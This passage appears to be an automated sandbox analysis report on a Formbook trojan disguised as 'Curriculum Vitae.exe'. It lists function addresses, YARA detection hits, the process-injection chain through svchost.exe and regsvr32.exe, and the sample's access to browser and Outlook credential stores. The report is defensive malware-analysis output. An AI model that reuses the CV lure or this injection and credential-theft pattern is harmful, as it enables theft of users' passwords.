            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA52A06_2_04BA52A0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C412ED6_2_04C412ED
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BBB2C06_2_04BBB2C0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BE739A6_2_04BE739A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5132D6_2_04C5132D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B8D34C6_2_04B8D34C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5FCF26_2_04C5FCF2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C19C326_2_04C19C32
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BBFDC06_2_04BBFDC0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C51D5A6_2_04C51D5A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C57D736_2_04C57D73
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA3D406_2_04BA3D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA9EB06_2_04BA9EB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA1F926_2_04BA1F92
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5FFB16_2_04C5FFB1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5FF096_2_04C5FF09
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA38E06_2_04BA38E0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C0D8006_2_04C0D800
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C359106_2_04C35910
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BA99506_2_04BA9950
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BBB9506_2_04BBB950
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C4DAC66_2_04C4DAC6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BE5AA06_2_04BE5AA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C41AA36_2_04C41AA3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C3DAAC6_2_04C3DAAC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C57A466_2_04C57A46
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5FA496_2_04C5FA49
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C13A6C6_2_04C13A6C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C15BF06_2_04C15BF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BBFB806_2_04BBFB80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04BDDBF96_2_04BDDBF9
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04C5FB766_2_04C5FB76
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_029319D06_2_029319D0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292CB906_2_0292CB90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292C9706_2_0292C970
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292C9696_2_0292C969
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292AC106_2_0292AC10
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292AD546_2_0292AD54
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0293321E6_2_0293321E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_029332206_2_02933220
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_029350306_2_02935030
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_029211216_2_02921121
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0294B5F06_2_0294B5F0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BE4436_2_048BE443
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BE7DC6_2_048BE7DC
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BE3246_2_048BE324
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BD8136_2_048BD813
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BD8486_2_048BD848
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BCAE86_2_048BCAE8
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: String function: 00D50A30 appears 46 times
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: String function: 00D4F9F2 appears 40 times
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: String function: 00D39CB3 appears 31 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04C1F290 appears 105 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04BD5130 appears 58 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04BE7E54 appears 103 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04B8B970 appears 280 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04C0EA12 appears 86 times
            Source: Curriculum Vitae.exe, 00000000.00000003.2108400826.0000000004183000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Curriculum Vitae.exe
            Source: Curriculum Vitae.exe, 00000000.00000003.2109326130.000000000432D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Curriculum Vitae.exe
            Source: Curriculum Vitae.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@5/4
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA37B5 GetLastError,FormatMessageW,0_2_00DA37B5
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D910BF AdjustTokenPrivileges,CloseHandle,0_2_00D910BF
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00D916C3
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00DA51CD
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DBA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00DBA67C
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00DA648E
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D342A2
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeFile created: C:\Users\user\AppData\Local\Temp\aut188B.tmpJump to behavior
            Source: Curriculum Vitae.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3269626827.0000000002E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Curriculum Vitae.exeReversingLabs: Detection: 65%
            Source: Curriculum Vitae.exeVirustotal: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\Curriculum Vitae.exe "C:\Users\user\Desktop\Curriculum Vitae.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Curriculum Vitae.exe"
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Curriculum Vitae.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Curriculum Vitae.exeStatic file information: File size 1268224 > 1048576
            Source: Curriculum Vitae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Curriculum Vitae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Curriculum Vitae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Curriculum Vitae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Curriculum Vitae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Curriculum Vitae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Curriculum Vitae.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OAIexgManRWDie.exe, 00000005.00000002.3269982810.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270006592.0000000000E9E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Curriculum Vitae.exe, 00000000.00000003.2110503181.0000000004250000.00000004.00001000.00020000.00000000.sdmp, Curriculum Vitae.exe, 00000000.00000003.2109991860.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2564850998.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2562563965.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2666256185.0000000003000000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000006.00000002.3270855352.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2666154415.000000000480C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.2668247041.00000000049B2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3270855352.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: regsvr32.pdb source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: regsvr32.pdbGCTL source: svchost.exe, 00000002.00000002.2666122437.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2633856083.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000002.3269624546.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000005.00000003.2611854418.000000000080B000.00000004.00000001.00020000.00000000.sdmp
            Source: Curriculum Vitae.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Curriculum Vitae.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Curriculum Vitae.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Curriculum Vitae.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Curriculum Vitae.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D342DE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D50A76 push ecx; ret 0_2_00D50A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411164 push esi; retf 2_2_00411185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411173 push esi; retf 2_2_00411185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417932 push ebp; retf 2_2_00417933
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411B1C push esi; iretd 2_2_00411B1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BC0 pushad ; ret 2_2_00401BEA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417BC5 push ecx; iretd 2_2_00417BC7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E55E push ebx; ret 2_2_0041E566
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D7F push es; iretd 2_2_00417D80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D0E push ss; retf 2_2_00417D11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EDC9 push ebp; retf 2_2_0041EDD4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411DF0 push ecx; ret 2_2_00411DF1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402FF0 push eax; ret 2_2_00402FF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04B909AD push ecx; mov dword ptr [esp], ecx6_2_04B909B6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292E180 push esi; retf 6_2_0292E192
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292E171 push esi; retf 6_2_0292E192
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02934BD2 push ecx; iretd 6_2_02934BD4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292EB29 push esi; iretd 6_2_0292EB2A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0293493F push ebp; retf 6_2_02934940
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02934D8C push es; iretd 6_2_02934D8D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0292EDFD push ecx; ret 6_2_0292EDFE
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02934D1B push ss; retf 6_2_02934D1E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0294169E pushfd ; iretd 6_2_029416A1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0293B56B push ebx; ret 6_2_0293B573
